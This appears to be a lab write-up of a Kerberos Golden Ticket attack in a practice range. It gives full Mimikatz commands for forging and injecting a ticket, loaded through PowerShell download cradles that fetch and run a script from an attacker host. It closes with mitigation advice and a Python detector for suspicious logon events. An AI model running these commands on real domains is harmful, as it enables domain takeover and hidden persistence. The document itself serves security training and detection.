Golden Ticket Attack
I have had the opportunity to work on my Windows attacking skills within a couple of different CyberRanges recently. I have been trying to understand the different use cases with Mimikatz and decided to share my experiences with a Golden Ticket Attack.
To start, a Golden Ticket is a post-exploitation attack that provides domain persistence. This means the attacker has already compromised an account that has DCSync rights to the Active Directory domain, and is therefore able to dump the krbtgt hash, as well as the domain SID, and use this information to create a forged Golden Ticket.
Prior to creating the Golden Ticket, I used the foothold system (WKS23) to test the local administrator account (pwn3d) credentials against the domain controller (DC01), which validated that pwn3d did not have privileges to DC01.
Instead of copying Mimikatz to the foothold system, I used a PowerShell Download Cradle (from my Attacker system) to execute Mimikatz commands. The first command was to create the Golden Ticket and the second command was to inject the Golden Ticket.
iex (iwr http://192.168.23.206/Invoke-Mimikatz.ps1 -UseBasicParsing); Invoke-Mimikatz -Command '"kerberos::golden /admin:IDontExist23 /domain:plum.local /sid:S-1-5-21-XXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX /krbtgt:<hash> /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080"'
iex (iwr http://192.168.23.206/Invoke-Mimikatz.ps1 -UseBasicParsing); Invoke-Mimikatz -Command '"kerberos::ptt ticket.kirbi"'
Using the krbtgt hash and the domain SID, I created a Golden Ticket and saved it with the default name (ticket.kirbi) to the current working directory. I wanted to save the ticket for later use instead of immediately using PassTheTicket (PTT).
I used the following flags in order to not use the default ticket life-time of 10 years:
· /domain:plum.local — fully qualified domain name
· /sid:S-1-5-21-XXXXXXXX-XXXXXXXXXX-XXXXXXXXXX — domain SID
· /krbtgt:<hash> — domain krbtgt account hash
· /admin:IDontExist23 — fake account
· /id:500 — impersonate the Domain Administrator (RID 500)
· /groups:512 — assign the fake account permissions of the Domain Admins group
· /startoffset:0 — time, in minutes, at which the ticket becomes available
· /endin:600 — life-time of the ticket in minutes (600 = 10 hrs)
· /renewmax:10080 — maximum life-time that the ticket can be renewed in minutes (10080 = 10 days)
With the ticket created and saved locally on WKS23, I used Mimikatz to inject the saved ticket and then validated that the ticket was created. Had I established a foothold to additional systems, I could have copied the Golden Ticket and injected it from those systems as well.
Next, I used Get-WmiObject and Net User to validate that the local Administrator account could access DC01 and validated that the fake user did not exist within LDAP.
To mitigate and detect Golden Ticket use:
- Reset the krbtgt password (twice) to invalidate current golden tickets
- Review and filter Security Event IDs 4624 and 4672
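One way to act on the 4624/4672 review above, as an added example that is not part of the original post: flag logons on the DC whose account name and SID do not agree with the directory, as with a fake name such as IDontExist23 paired with RID 500. It assumes the events are exported as dictionaries, that a SID-to-name directory export is available, and that the forged name and SID appear in the logon event as carried in the ticket; the domain SID, IP addresses and logon IDs are constructed.

```python
# Added example with constructed data; not taken from the original post.
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed placeholder
# Assumed directory export (SID -> sAMAccountName), constructed for this example.
DIRECTORY = {f"{DOMAIN_SID}-500": "Administrator", f"{DOMAIN_SID}-1104": "jsmith"}
# Constructed records using the field names of Security events 4624 and 4672.
EVENTS = [
    {"EventID": 4624, "Computer": "DC01", "TargetUserName": "SYSTEM",
     "TargetUserSid": "S-1-5-18", "TargetLogonId": "0x3e7", "IpAddress": "-"},
    {"EventID": 4624, "Computer": "DC01", "TargetUserName": "jsmith",
     "TargetUserSid": f"{DOMAIN_SID}-1104", "TargetLogonId": "0x3e1a",
     "IpAddress": "192.168.23.50"},
    {"EventID": 4624, "Computer": "DC01", "TargetUserName": "IDontExist23",
     "TargetUserSid": f"{DOMAIN_SID}-500", "TargetLogonId": "0x4f2b",
     "IpAddress": "192.168.23.77"},
    {"EventID": 4672, "Computer": "DC01", "SubjectUserName": "IDontExist23",
     "SubjectUserSid": f"{DOMAIN_SID}-500", "SubjectLogonId": "0x4f2b"},
]

def find_mismatched_logons(events, directory):
    """Flag 4624 logons whose account name and SID disagree with the directory."""
    known_names = {name.lower() for name in directory.values()}
    # Logon sessions that were granted special privileges (event 4672).
    privileged = {(e["Computer"], e["SubjectLogonId"])
                  for e in events if e["EventID"] == 4672}
    findings = []
    for e in events:
        if e["EventID"] != 4624 or not e["TargetUserSid"].startswith("S-1-5-21-"):
            continue  # skip well-known SIDs such as SYSTEM (S-1-5-18)
        name, sid = e["TargetUserName"], e["TargetUserSid"]
        reasons = []
        owner = directory.get(sid)
        if owner is None:
            reasons.append("SID not in directory")
        elif owner.lower() != name.lower():
            reasons.append(f"SID belongs to {owner}")
        if name.lower() not in known_names:
            reasons.append("account name not in directory")
        if reasons:
            findings.append({
                "account": name, "sid": sid, "source": e.get("IpAddress"),
                "privileged": (e["Computer"], e["TargetLogonId"]) in privileged,
                "reasons": reasons,
            })
    return findings

if __name__ == "__main__":
    for finding in find_mismatched_logons(EVENTS, DIRECTORY):
        print(finding)
```

A finding with `privileged` set means the same logon session also produced a 4672 event, which is the combination worth triaging first.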
This article is made available for educational purposes only!!! In addition, this article provides general information on cyber security topics used for “Ethical Hacking”.
Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose. Furthermore, the author is not liable for any direct or indirect damages or expense incurred which may result from the use of the information covered within this article.
Information within this article is “as is”, without warranty of any sort.